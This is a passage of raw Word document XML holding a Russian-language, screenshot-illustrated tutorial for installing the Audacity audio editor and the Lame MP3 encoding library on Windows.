            <wp:docPr id="27715" name="Рисунок 242" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/ri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www.teatrbaby.ru/master_zvuk/images/im_audacity/ris2.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId108" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1068378" cy="540540"/>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2. Выбор языка установки программы</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Нас приветствует Мастер установки Audacity (рис. 3). Нажимаем на кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Далее</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550987" cy="1195200"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27716" name="Рисунок 243" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/ris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www.teatrbaby.ru/master_zvuk/images/im_audacity/ris3.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1552576" cy="1196424"/>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 xml:space="preserve">Рис. 3. </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:bCs/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:bCs/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Вас приветствует Мастер установки Audacity</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:bCs/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="main"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="138" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Следующее окно (рис. 4) предлагает вам текст лицензионного соглашения.</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622550" cy="1250348"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27717" name="Рисунок 244" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/ri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www.teatrbaby.ru/master_zvuk/images/im_audacity/ris4.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId110" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1628428" cy="1254878"/>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4. Лицензионное соглашение</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Согласно этому соглашению вы имеете полное право на </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>бесплатное пользование данной программой</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">, так как Audacity относится к свободно распространяемому </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">программному обеспечению. При желании вы можете более подробно ознакомиться с текстом лицензии. Мы же щелкаем по кнопке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</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В следующем окне (рис. 5) предлагается папка для установки Audacity. Ничего не изменяя, щелкаем по кнопке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Далее</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550550" cy="1194864"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27718" name="Рисунок 245" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/ris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www.teatrbaby.ru/master_zvuk/images/im_audacity/ris5.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1554995" cy="1198289"/>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5. Выбор папки установки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="main"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="138" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>На очередном шаге мастер предлагает поместить значок программы на Рабочий стол (рис. 6). Ничего не изменяя, нажимаем на кнопку</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Далее</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550550" cy="1197086"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27719" name="Рисунок 246" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/ris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www.teatrbaby.ru/master_zvuk/images/im_audacity/ris6.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1552697" cy="1198743"/>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6. Значок – на Рабочий стол</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Теперь все готово для установки программы (рис. 7). Нажимаем на кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Установить</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597699" cy="1231200"/>
            <wp:effectExtent l="19050" t="0" r="2501" b="0"/>
            <wp:docPr id="27720" name="Рисунок 247" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/ris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www.teatrbaby.ru/master_zvuk/images/im_audacity/ris7.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId113" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1606218" cy="1237765"/>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7. Мастер готов к установке программы</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На рисунке 8 показан процесс установки программы. </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599045" cy="1226514"/>
            <wp:effectExtent l="19050" t="0" r="1155" b="0"/>
            <wp:docPr id="27721" name="Рисунок 248" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/ris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www.teatrbaby.ru/master_zvuk/images/im_audacity/ris8.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId114" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1604516" cy="1230710"/>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8. Установка программы</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Появилось еще одно окно, в котором указывается адрес сайта и форум, посвященные звуковому редактору. </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600315" cy="1233215"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27722" name="Рисунок 249" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/ris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www.teatrbaby.ru/master_zvuk/images/im_audacity/ris9.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1605100" cy="1236902"/>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9. Важная информация</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Щелкаем по кнопке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">и в окне </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Завершение Мастера установки Audacity</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> (рис. 10) щелкаем по кнопке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Завершить</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1541641" cy="1188000"/>
            <wp:effectExtent l="19050" t="0" r="1409" b="0"/>
            <wp:docPr id="27723" name="Рисунок 250" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/ris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www.teatrbaby.ru/master_zvuk/images/im_audacity/ris10.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1548695" cy="1193436"/>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10. Завершение установки</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Перед нами окно </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Добро пожаловать в Audacity</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> (рис. 11). Чтобы оно не появлялось каждый раз при запуске программы, ставим галочку в левом нижнем углу, затем щелкаем по кнопке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>ОК</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">. </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550550" cy="1375567"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27724" name="Рисунок 251" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/ris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www.teatrbaby.ru/master_zvuk/images/im_audacity/ris11.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1553843" cy="1378488"/>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11. Добро пожаловать в Audacity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="main"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="138" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>На рисунке 12 показан общий вид программы Audacity.</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562576" cy="1440000"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27726" name="Рисунок 252" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/ris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www.teatrbaby.ru/master_zvuk/images/im_audacity/ris12.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1565460" cy="1442658"/>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12. Окно звукового редактора Audacity</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Теперь звуковой редактор можно запускать с Рабочего стола или через кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Пуск </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Панели задач.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="main"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="138" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Установка на этом может быть завершена, однако рекомендуется установить дополнительную библиотеку Lame MP3, которая позволит сохранять звуковой отредактированный материал в формате MP3 (без наличия библиотеки редактор позволяет сохранять звук только в формате WAVE).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="main"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="138" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Установка библиотеки Lame</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Mp3</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Щелкаем по ссылке </w:t>
      </w:r>
      <w:hyperlink r:id="rId119" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>program</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и в открывшемся окне дважды щелкаем по файлу Lame_v3.99.3_for_Windows.exe. В открывшемся окне с вопросом </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Разрешить внесение изменений…</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> (рис. 13) щелкаем по кнопке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Да</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809750" cy="1113405"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27727" name="Рисунок 253" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame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www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame_1.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId120" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1816120" cy="1117324"/>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13. Разрешить внесение изменений..?</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На английском языке нас приветствует Мастер установки библиотеки Lame (рис. 14). Нажимаем на кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Next</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1809750" cy="1394605"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27728" name="Рисунок 254" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lam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www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame_2.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId121" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1813202" cy="1397265"/>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 xml:space="preserve">Рис. 14. </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:bCs/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:bCs/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Вас приветствует Мастер установки Lame</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:bCs/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>»</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Следующее окно (рис. 15) предлагает Вам прочитать важную информацию. Прочитали? Щелкаем по кнопке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Next</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809750" cy="1394606"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27729" name="Рисунок 255" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame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www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame_3.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1812328" cy="1396593"/>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15. Важная информация</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В следующем окне (рис. 16) предлагается папка для установки библиотеки Lame. Ничего не изменяя, щелкаем по кнопке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Next</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759350" cy="1355766"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27730" name="Рисунок 256" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame_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www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame_4.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1763399" cy="1358886"/>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16. Выбор папки установки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="main"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="138" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Мастер извещает о том, что все готово для установки программы (рис. 17).</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809750" cy="1394606"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27731" name="Рисунок 257" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame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www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame_5.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId124" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1811931" cy="1396287"/>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17. Мастер готов к установке программы</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Нажимаем на кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Install</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">. На рисунке 18 показан процесс установки программы. </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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1845750" cy="1422347"/>
            <wp:effectExtent l="19050" t="0" r="2100" b="0"/>
            <wp:docPr id="27732" name="Рисунок 258" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame_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www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame_6.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId125" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1845775" cy="1422366"/>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18. Установка программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="main"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="138" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Через некоторое время появилось окно с сообщением, что установка завершена (рис. 19). Щелкаем по кнопке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Finish</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="mainbolditalliccenter"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1843845" cy="1420880"/>
            <wp:effectExtent l="19050" t="0" r="4005" b="0"/>
            <wp:docPr id="27733" name="Рисунок 259" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame_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www.teatrbaby.ru/master_zvuk/images/im_audacity/audacity_lame_7.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1850429" cy="1425954"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="mainbolditalliccenter"/>
